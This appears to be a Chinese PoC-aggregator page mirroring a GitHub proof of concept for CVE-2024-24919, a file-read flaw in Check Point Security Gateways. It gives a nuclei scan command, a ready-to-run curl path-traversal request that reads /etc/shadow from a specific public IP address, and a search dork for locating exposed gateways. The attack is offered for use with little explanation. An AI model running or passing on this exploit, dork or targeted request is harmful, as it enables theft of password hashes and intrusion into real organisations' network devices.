POC详情: cc9dc553379b43b1dde93b156653d50fb820677a

来源
https://github.com/0xYumeko/CVE-2024-24919
关联漏洞
标题: Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
描述:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
介绍
<h1>Check point:CVE-2024-24919</h1>

![2024-05-31_08-14](https://github.com/0x3f3c/CVE-2024-24919/assets/154844497/ca4abf7a-0cc1-4f51-95de-949f67e156ad)


<h1> run CVE </h1>

```
nuclei -list chick.txt -t CVE-2024-24919.yaml
```


<h>Replace <ip> with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.</h>


```
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
```

![cve](https://github.com/0x3f3c/CVE-2024-24919/assets/154844497/ed7a46c4-3e67-498f-906f-28711391a163)


<h1>Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"</h1>
文件快照

 [4.0K]  /data/pocs/cc9dc553379b43b1dde93b156653d50fb820677a
├── [3.9K]  CVE-2024-24919.sh
├── [1.1K]  CVE-2024-24919.yaml
└── [ 780]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。